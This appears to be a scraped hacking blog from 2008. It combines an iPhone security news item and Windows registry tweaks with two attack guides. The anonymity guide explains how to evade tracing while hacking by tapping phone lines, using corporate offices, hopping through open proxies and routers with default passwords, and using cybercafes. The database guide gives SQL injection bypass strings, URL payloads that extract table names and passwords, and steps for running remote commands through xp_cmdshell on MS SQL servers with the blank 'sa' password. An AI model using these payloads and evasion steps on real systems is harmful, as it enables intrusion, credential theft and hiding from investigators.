Double click option (Default), and in Value Data, fill with Windows Explorer path(C:\WINDOWS\Explorer.exe).
Real tricks-1
Real tricks-2
Real tricks-3
Real tricks-4

iphone 3G

2008-10-14T18:57:00.004+05:30

The much-hyped iPhone 3G by Apple is becoming notorious on the Net for its security flaws. According to recent reports by online forums and top gizmo sites on the web, the Apple iPhone has become vulnerable to serious security threats like phishing and spyware.

For instance, a security flaw in Apple Inc’s iPhone allows unauthorised users to gain easy access to your private contacts and emails even when the device is ‘locked’, say top mobile review site like intomobile.com and the iphoneblog.com, a site developed around iPhone users. The iPhone comes locked when you buy it from the market. It’s only the operator who can unlock the phone legally. Meanwhile, network and mobile security experts also point out the flaws in the iPhone’s Safari web browser. “The iPhone’s Safari browser is one of the most vulnerable browsers and is prone to not only phishing but also to spread of spyware. Using APPLE SDK (software development kit), a hacker can create phone spying software which can anonymously send or receive SMS without notifying the owner,” said network security firm Appin’s CEO, Rajat Khare.

According to online forums, flaws in the mail and Safari applications bundled with the iPhone leave users of the device at greater risk of phishing attacks. Apple failed to reply to ET’s repeated email queries on the issue. Another vulnerability in the iPhone is URL-spoofing.

It means that a dodgy domain pointed to by a specially crafted URL can appear to be that of a trusted brand when viewed through the iPhone’s mail or Safari browser applications. The iPhone does not display the URL of a link embedded into an email, making it easier to trick the user into pointing the Safari browser to a phishing website. Even the dialing process of iPhone can be hijacked via JavaScript, the blog sites report.

Meanwhile, Gizmodo, a too Gizmo review site and a MacRumors.com claim that it takes only three taps to gain access to the locked iPhones. “Earlier hacking reports were predominantly on the Windows platform, now with iPhone gaining popularity, hackers have trained their eyes on it. Although Apple has released the latest version of security software, it is unlikely that it will solve the issues completely,” said Trend Micro country manager – India and SAARC, Niraj Kaushik.
The Safari browser of the iPhone can very easily lead to the phone being hacked, say online forums. Using the vulnerability in the Apple code the hacker can spy all the activity done on the Phone. Once broken the hacker can access, personal data, SMS text files, contact information, call history, passwords, e-mail, browser history, and voice mail information could be obtained by a remote attacker.

The hacker can also exploit the iPhone to dial a phone number or send a text message without prompting the user. The iPhone can also be turned into a microphone to eavesdrop remote conversations. Experts suggest a third party anti virus software to be installed on the iPhone, in order to ensure protection during download of data untrustworthy sources.
Meanwhile Apple has been fixing bugs in the iPhone regularly. For instance, Apple addressed ‘the passcode flaw’ in iPhones last January. The fix prevented unauthorized users from circumventing the password-protected locking feature. The problem has however, reemerged in new versions of the iPhone software.

The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. However, the flaw allows attackers to bypass the passcode-locking feature by just touching “Emergency Call” on the password-entry screen and then double tapping the home button.

Though the iPhone was launched in India, last month, the phone may not find it replacing other business phones used by corporate executives, if Apple doesn’t fix the flaws fast enough.

source:-Economic Times
http://economictimes.indiatimes.com/News/News_By_Industry/Apple_iPhone_prone_to_phishing_say_Net_forums/articleshow/3532345.cms

Staying anonymous on net

2008-10-14T16:51:00.003+05:30
I always wondered whether i could ever transform myself into wind. Moving from places to places, with no rules, no restrictions and above all no individuality. It looks distant reality in real life but being anonymous on net is not that tough.

Before you can start to hack systems you need a platform to work from. This platform must be stable and not easily traceable. How does one become anonymous on the Internet? . Let us look.

Permanent connection (leased line, cable, fiber)

The problem with these connections is that it needs to be installed by your local Telecom at a premise where you are physically located. Most ISPs wants you to sign a contract when you install a permanent line, and ask for identification papers. So, unless you can produce false identification papers, company papers etc., and have access to a building that cannot be directly tied to your name, this is not a good idea.

Dial-up

Many ISPs provides “free dial-up” accounts. The problem is that logs are kept either at the ISP, or at Telecom of calls that were made. At the ISP side this is normally done using RADIUS or TACACS. The RADIUS server will record the time that you dialed in, the connection speed, the reason for disconnecting, the time that you disconnected and the userID that you used. Armed with his information the Telecom can usually provide the source number of the call (YOUR number). For the Telecom to pinpoint the source of the call they need the destination number (the number you called), the time the call was placed and the duration of the call. In many cases, the Telecom need not be involved at all, as the ISP records the source number themselves via Caller Line Identification (CLI).

Let us assume that we find the DNS name “c1-pta-25.dial-up.net” in our logs and we want to trace the attacker. We also assume that the ISP does not support caller line identification, and the attacker was using a compromised account. We contact the ISP to find out what the destination number would be with a DNS name like that. The ISP provides the number - e.g. +27 12 664 5555. It’s a hunting line - meaning that there is one number with many phone lines connected to it. We also tell the ISP the time and date the attack took place (from our logs files). Let us assume the attack took place 2000/8/2 at 17h17. The RADIUS server tells us what userID was used, as well as the time it was connected: (these are the typical logs)

6774138 2000-08-02 17:05:00.0 2000-08-02 17:25:00.0 demo1 icon.co.za 168.209.4.61 2 Async 196.34.158.25 52000 1248 00010 B6B 87369 617378 null 11

These logs tell us that user “demo1″ was connected from 17h05 to 17h25 on the date the attack took place. It was dialing in at a speed of 52kbps, it send 87369 bytes, and received 617378 bytes. We now have the start time of the call, the destination number and the duration of the call (20 minutes). Telecom will supply us with source number as well as account details - e.g. physical location. As you can see, phoning from your house to an ISP (even using a compromised or free ID) is not making any sense.

Mobile (GSM) dial-up

Maybe using a GSM mobile phone will help? What can the GSM mobile service providers extract from their logs? What is logged? A lot it seems. GSM switches send raw logging information to systems that crunch the data into what is called Call Data Records (CDRs). More systems crush CDRs in SCDRs (Simple CDR). The SCDRs is sent to the various providers for billing. How does a CDR look like? Hereby an example of a broken down CDR:

99042300000123000004018927000000005216003

27834486997

9903220753571830

834544204

000001MOBILE000

0000001000000000000000000

AIRTIME1:24

20377

UON0000T11L

MTL420121414652470

This tells us that date and time the call was placed (1st string), the source number (+27 83 448 6997), the destination number (834544204), that it was made from a mobile phone, the duration of the call (1 minute 24 seconds), the cellID (20377), the three letter code for the service provider (MTL = Mtel in this case), and the unique mobile device number (IMEI number) 420121414652470. Another database can quickly identify the location (long/lat) of the cell. This database typically looks like this:

20377

25731

-26.043059

28.011393

120

32

103

“Didata Oval uCell”,”Sandton”

From this database we can see that the exact longitude and latitude of the cell (in this case in the middle of Sandton, Johannesburg) and the description of the cell. The call was thus placed from the Dimension Data Oval in Sandton. Other databases provide the account information for the specific source number. It is important to note that the IMEI number is also logged - using your phone to phone your mother, switching SIM cards, moving to a different location and hacking the NSA is not a good idea using the same device is not bright - the IMEI number stays the same, and links you to all other calls that you have made. Building a profile is very easy and you’ll be nailed in no time.

Using time advances and additional tracking cells, it is theoretically possible to track you up to a resolution of 100 meters, but as the switches only keep these logs for 24 hours, it is usually done in real time with other tracking devices - and only in extreme situations. Bottom line - even if you use a GSM mobile phone as modem device, the GSM service providers knows a lot more about you than you might suspect.

How to

So how do we use dial in accounts? It seems that having a compromised dial in account does not help at all, but common sense goes a long way. Suppose you used a landline, and they track you down to someone that does not even owns a computer? Or to the PABX of a business? Or to a payphone? Keeping all of above in mind - hereby a list of notes: (all kinda common sense)

Landlines:

1. Tag your notebook computer, modem and croc-clips along to a DP (distribution point). These are found all around - it is not discussed in detail here as it differs from country to country. Choose a random line and phone.

2. In many cases one can walk into a large corporation with a notebook and a suit with no questions asked. Find any empty office, sit down, plug in and dial.

3. etc…use your imagination

GSM:

1. Remember that the device number (IMEI) is logged (and it can be blocked). Keep this in mind! The ultimate would be to use a single device only once. - never use the device in a location that is linked to you (e.g. a microcell inside your office)

2. Try to use either a very densely populated cell (shopping malls) or a location where there is only one tracking cell (like close to the highway) as it makes it very hard to do spot positioning. Moving around while you are online also makes it much harder to track you down.

3. Use prepaid cards! For obvious reasons you do not want the source number to point directly to you. Prepaid cards are readily available without any form of identification. (note: some prepaid cards does not have data facilities, so find out first)

4. GSM has data limitations - currently the maximum data rate is 9600bps.

Using the I’net

All of this seems like a lot of trouble. Is there not an easier way of becoming anonymous on the Internet? Indeed there are many ways to skin a cat. It really depends on what type of connectivity you need. Lets assume all you want to do is sending anonymous email (I look at email specifically because many of the techniques involved can be used for other services such as HTTP, FTP etc.). How difficult could it be?

For many individuals it seems that registering a fake Hotmail, Yahoo etc. account and popping a flame email to a unsuspected recipient is the way to go. Doing this could land you in a lot of trouble. Lets look at a header of email that originating from Yahoo:

Return-Path:

Received: from web111.yahoomail.com (web111.yahoomail.com [205.180.60.81])

by wips.sensepost.com (8.9.3/1.0.0) with SMTP id MAA04124

for ; Sat, 15 Jul 2000 12:35:55 +0200 (SAST)

(envelope-from r_h@yahoo.com)

Received: (qmail 636 invoked by uid 60001); 15 Jul 2000 10:37:15 -0000

Message-ID: <20000715103715.635.qmail@web111.yahoomail.com>

Received: from [196.34.250.7] by web111.yahoomail.com; Sat,

15 Jul 2000 03:37:15 PDT

Date: Sat, 15 Jul 2000 03:37:15 -0700 (PDT)

From: RH

Subject: Hello

To: roelof@sensepost.com

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

The mail header tells us that our mailserver (wips.sensepost.com) received email via SMTP from the web-enabled mailserver (web111.yahoomail.com). It also tells us that the web-enabled mailserver received the mail via HTTP (the web) from the IP number 196.34.250.7. It is thus possible to trace the email to the originator. Given the fact that we have the time the webserver received the mail (over the web) and the source IP, we can use techniques explained earlier to find the person who was sending the email. Most free web enabled email services includes the client source IP (list of free email providers at www.fepg.net).

How to overcome this? There are some people that think that one should be allowed to surf the Internet totally anonymous. An example of these people is Anonymizer.com (www.anonymizer.com). Anonymizer.com allows you to enter a URL into a text box. It then proxy all connections to the specified destination. Anonymizer claims that they only keep hashes (one way encryption, cannot be reversed) of logs. According to documentation on the Anonymizer website there is no way that even they can determine your source IP. Surfing to Hotmail via Anonymizer thus change the IP address in the mail header.

But beware. Many ISPs make use of technology called transparent proxy servers. These servers is normally located between the ISP’s clients and their main feed to the Internet. These servers pick up on HTTP requests, change the source IP to their own IP and does the reverse upon receiving the return packet. All of this is totally transparent to the end user - therefore the name. And the servers keep logs. Typically the servers cannot keep logs forever, but the ISP could be backing up logs for analyses. Would I be tasked to find a person that sent mail via Hotmail and Anonymizer I would ask for the transparent proxy logs for the time the user was connected to the web-enabled mailserver, and search for connections to Anonymizer. With any luck it would be the only connections to the Anonymizer in that time frame. Although I won’t be able to prove it, I would find the source IP involved.

Another way of tackling the problem is anonymous remailers. These mailservers will change your source IP, your field and might relay the mail with a random delay. In many cases these remailers are daisy chained together in a random pattern. The problem with remailers is that many of them do keep logs of incoming connections. Choosing the initial remailer can be become an art. Remailers usually have to provide logfiles at the request of the local government. The country of origin of the remailer is thus very important as cyberlaw differs from country to country. A good summary of remailers (complete with listings of remailers can be found at www.cs.berkeley.edu/~raph/remailer-list.html).

Yet another way is to make use of servers that provide free Unix shell accounts. You can telnet directly to these servers (some provide SSH (encrypted shells) access as well). Most of the free shell providers also provide email facilities, but limit shell capabilities -e.g. you can’t telnet from the free shell server to another server. In 99% of the cases connections are logged, and logs are kept in backup. A website that list most free shell providers are to be found at www.leftfoot.com/freeshells.html. Some freeshell servers provider more shell functionality than others - consult the list for detailed descriptions.

How do we combine all of the above to send email anonymously? Consider this - I SSH to a freeshell server. I therefor bypass the transparent proxies, and my communication to the server is encrypted and thus invisible to people that might be sniffing my network (locally or anywhere). I use lynx (a text based web browser) to connect to an Anonymizer service. From the Anonymizer I connect to a free email service. I might also consider a remailer located somewhere in Finland. 100% safe?

Even when using all of above measures I cannot be 100% sure that I cannot be traced. In most cases logs are kept of every move you make. Daisy chaining and hopping between sites and servers does make it hard to be traced, but not impossible.

Other techniques

1. The cybercafe is your friend! Although cybercafes are stepping up their security measures it is still relatively easy to walk into a cybercafe without any form of identification. Sit down, and surf to hotmail.com - no one would notice as everyone else is doing exactly the same thing. Compose your email and walk out. Do not become a regular! Never visit the scene of the crime again. When indulging in other activities such as telnetting to servers or doing a full blast hack cybercafes should be avoided as your activity can raise suspicion with the administrators.

2. Search for proxy like services. Here I am referring to things like WinGate servers. WinGate server runs on a Microsoft platform and is used as a proxy server for a small network (read SOHO environment with a dial-up link). In many cases these servers are not configured correctly and will allow anyone to proxy/relay via them. These servers do not keep any logs by default. Hoping via WinGate servers is so popular that lists of active WinGates are published (www.cyberarmy.com/lists/wingate/).

3. With some experience you can hop via open routers. Finding open routers are very easy - many routers on the Internet is configured with default passwords (list of default passwords to be found at www.nerdnet.com/security/index.php )

Doing a host scan with port 23 (later more on this) in a “router subnet” would quickly reveal valid candidates. In most of the cases these routers are not configured to log incoming connections, and provides excellent stepping-stones to freeshell servers. You might also consider daisy chaining them together for maximum protection.

4. Change the communication medium. Connect to a X.25 pad via a XXX service. Find the DTE of a dial-out X.25 PAD. Dial back to your local service provider. Your telephone call now originates from e.g. Sweden. Confused? See the section on X.25 hacking later in the document. The exact same principle can be applied using open routers (see point 3) Some open routers listens on high ports (typically 2001,3001,X001) and drops you directly into the AT command set of a dial-out modems. Get creative.

The best way to stay anonymous and untraceable on the Internet would be a creative mix of all of the above-mentioned techniques. There is no easy way to be 100% sure all of the time that you are not traceable. The nature of the “hack” should determine how many “stealth” techniques should be used. Doing a simple portscan to a university in Mexico should not dictate that you use 15 hops and 5 different mediums.

For more information read: Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]

Real Tricks -2

2008-10-13T22:05:00.005+05:30
note:-these tricks are collected over net.well i don't guarantee you that all tricks will work.use the tricks at your own risk.

Change any system icon

NOTE: Before using this tweak know that it is potentially dangerous to your system... ALWAYS make backups!!!! Also NOTE: I am not responsible for any damage to your computer USE AT YOUR OWN RISK! I've used Icon Packager for the longest time to change all the icons in my Windows XP system. Until I decided that wasn't enough. But there is a way to change 95% of the icons that you see in your windows system. The key to understanding this process is knowing that many files installed in windows has embedded icons. We are simply going to replace the old ones with new ones. :)

1. Get a copy of Microangelo. at http://www.microangelo.us/

2. While Microangelo is downloading you need to make 2 backups of any files that you will be replacing. for this example we will use shell32.dll This file is located at c:\windows\system32\shell32.dll. To view these files you need to turn off 'Hide protected operating system files' and 'Show hidden files and folders' in the view tab of the folder options under tools in my computer. One of these backups is for editing purposes and the other is pure backup.

3. Once Microangelo is downloaded and installed, open librarian. librarian is an application that can open up exe's and just about any file with embedded icons.

4. Once librarian is opened, open the first backup of that shell32.dll file. and Voilà!! Tons of icons, actually most of the icons in the entire system. :)

5. Here comes the fun part. simply right click on an icon that you want to change click on replace and navigate to your new icon.

6. Once you've changed all the icons that you want, Save the file. Now you have a new and improved shell32 file. Now comes the hard part.

7. First off, XP is very clever in creating a backup of all its important system files so you need to replace these backups. Navigate and copy the new shell32.dll file to these two locations: c:\Windows\System32\dllcache and if you have SP1 installed c:\Windows\ServicePackFiles\i386

8. Now that you have the backup files taken care o

Change Browser Toolbar Background

This tweak customizes the appearance of the Internet Explorer Toolbar

XP Professional

1. Click Start > Run > Type gpedit.msc
2. Click User Configuration > Windows Setting > Internet Explorer Maintenance > Browser User Interface
3. Double click on Browser Toolbar Customization
4. Click on Customize Toolbar Background Bitmap
5. Browse for the new Background

XP Home Edition

1. Click Start > Run, type: regedit
2. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar
3. Right click on an empty spot and create a new string value
4. Name it BackBitmapIE5
5. Doubleclick on BackBitmapIE5 and type in the path of your toolbar bitmap
6. Click OK and close regedit
(always backup before making any changes in the registry)

Note: Because you can customize your browser toolbar there isn't a specific size which
you need to make this tweak work. Play around with the size until you get it right.

The Width of your toolbar with be the width of your resolution. 1024 will be your width
if your resolution is 1024x768.

Change Log On Screen Colors

Microsoft includes three default "shell styles" with the Windows XP Luna theme: Homestead, Metallic, and NormalColor.

You can see these three styles in the "Welcome to Windows" and "Log On to Windows" screens during logon.

To change the style, open regedit and go to: HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager
Change the "ColorName" key value to either "Homestead" or "Metallic". "Homestead" will show the title bars in an olive color. "Metallic" will show them in a silver color.

Log off or reboot to see the change.

Note: this will only work on the original Ctrl+Alt+Del log on screen, not the new Welcome screen.

Change Orginal Desktop Wallpaper

This is more of a fun tweak than it is useful.

Go to run, type regedit press ok.
when that comes up go to HKEY_CURRENT_USER>Control Panel>Desktop
Now find the orginalwallpaper, right click and select modify.
In the text box type the path to the file you want to be your orginal desktop wallpaper.

There ya go!

Create SendTo menu items

Open Explorer and type the following into the address bar:

X:\Documents and Settings\username\SendTo (Where X: is your System Drive letter and "username" is your Username)

Add a shortcut to the file or program of your choice.

Creating a Keyboard Shortcut

1. Right-click a shortcut on the desktop or in the start menu, and then click Properties .

2. On the Shortcut tab, click in the Shortcut Key box.

3. Press the key you want to use. Windows will add Ctrl+Alt to it. So if you choose U the combination will be Ctrl+Alt+U.
You can also choose one of the function keys you don't use otherwise, F7 as example. Just one button to click then.

4. Click OK .

Delete/Repair the Windows Media Player Library

If you have moved your music around on your hard drives, Windows Media Player continues to add new entries into it's library instead of modifying the existing ones. This means that you will now have multiple entries for the same song, half of which will not work now because you have moved the files to their new location. To delete the current library and build a new one, do the following:

1. Close Windows Media Player, wait about 3 seconds for the database to close.

2. Using "My Computer", navigate to the following folder:
F (or whatever drive is appropriate for you):\Documents and Settings\All Users\Application Data\Microsoft\Media Index

3. Delete the "wmplibrary....db" file here. This is not your actual music, only the database which Windows Media Player uses as a listing.

4. Start Windows Media Player

5. Hit "F3" and enter the location where you have moved your music to. If it is on muliple drives, check "All Drives". Let it finish.

You're Done!
All the old listings will now be gone, and you will only have the new accurate ones.

Display the Windows version on your deskt

It is possible to display the version of Windows in the lower right corner of your desktop. This requires a modification in the Windows Registry.

Note:
You cannot decide what text you want to appear; it's predefined, based on the version of Windows you are running. For example, the text for Windows XP Professional with Service Pack 2 will be along the lines of:

Windows XP Professional
Build 2600.xpsp_sp2_rtm.040803-2158 (Service Pack 2)

Procedure:

1) Click the Start button, click Run, type regedit and click OK

2) On the left-hand side, navigate to (and highlight)
HKEY_CURRENT_USER\Control Panel\Desktop

3) On the right-hand side, locate PaintDesktopVersion and double-click it

4) In the pop-up window, change the data to 1 and click OK

Note:
0 = Hide Windows version from desktop
1 = Show Windows version on desktop

5) Close the Windows Registry Editor as well as your other programs and reboot (or log off and log back in).

Easier way to kill microsoft tick sound

The annoying "tick" sound is microsoft's default sound for "start navigation" which can be disabled through control panel-->sounds

Faster Application Access

Have you ever wanted to have your program shortcuts withing a clicks reach without crowding the desktop? And do you have to many apps to pin them all to the start menu? If so, then this might be a solution for you aswell.

1) Create a new folder anywhere you like and name it "Progz", "Gamez" or "Music" according to your will and pleasure.

2) Place shortcuts of the stuff you need into this folder.

3) Right-click on the windows tastbar and select "toolbars" and "New toolbar". Then you simply refer to your "Progz" folder.

And there you have it... all your applications within a clicks reach.... and a clean desktop aswell. I have my menues minimized, so I only see the names of the categories or folders, and then locked the taskbar, making room for the active applications to be shown.

Adding new items to the toolbar is done simply by copying or creating shortcuts into the original folder, then your menu updates itself.

This can also be a good way of organizing applications into different categories... you just make seperate toolbars.

Real tricks-1
Real tricks-2
Real tricks-3
Real tricks-4

DataBase Hacking

2008-10-13T07:47:00.004+05:30
Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

The article is divided into two parts:
1. Using the HTTP port 80
2. Using the MS SQL port 1434

Part I – Using HTTP port 80 ( Or better would be malformed URLs)
----------------------------------------------------------------

This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.

login.htm
<html> <body> <form method=get action="logincheck.asp"> <input type="text" name="login_name"> <input type="text" name="pass"> <input type="submit" value="sign in"> form> body> html>
logincheck.asp
<@language="vbscript"> <% dim conn,rs,log,pwd log=Request.form("login_name") pwd=Request.form("pass") set conn = Server.CreateObject("ADODB.Connection") conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb" conn.Open set rs = Server.CreateObject("ADODB.Recordset") rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn If rs.EOF response.write("Login failed") else response.write("Login successful") End if %>

Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide

Chintan ' --
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using
http://neworder.box.sk/redirect.php?http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are

sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue ->Delets a registry value

xp_regread -> Reads a registry value

xp_regwrite -> Writes a registry key.

xp_terminate_process -> Stops a process

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.

Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.
C:>osql.exe -? osql: unknown option ? usage: osql [-U login id] [-P password] [-S server] [-H hostname] [-E trusted connection] [-d use database name] [-l login timeout] [-t query timeout] [-h headers] [-s colseparator] [-w columnwidth] [-a packetsize] [-e echo input] [-I Enable Quoted Identifiers] [-L list servers] [-c cmdend] [-q "cmdline query"] [-Q "cmdline query" and exit] [-n remove numbering] [-m errorlevel] [-r msgs to stderr] [-V severitylevel] [-i inputfile] [-o outputfile] [-p print statistics] [-b On error batch abort] [-O use Old ISQL behavior disables the following] <EOF> batch processing Auto console width scaling Wide messages default errorlevel is -1 vs 1 [-? show syntax summary]
Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type

C:\> osql.exe –S 198.188.178.1 –U sa –P “”
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”

I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

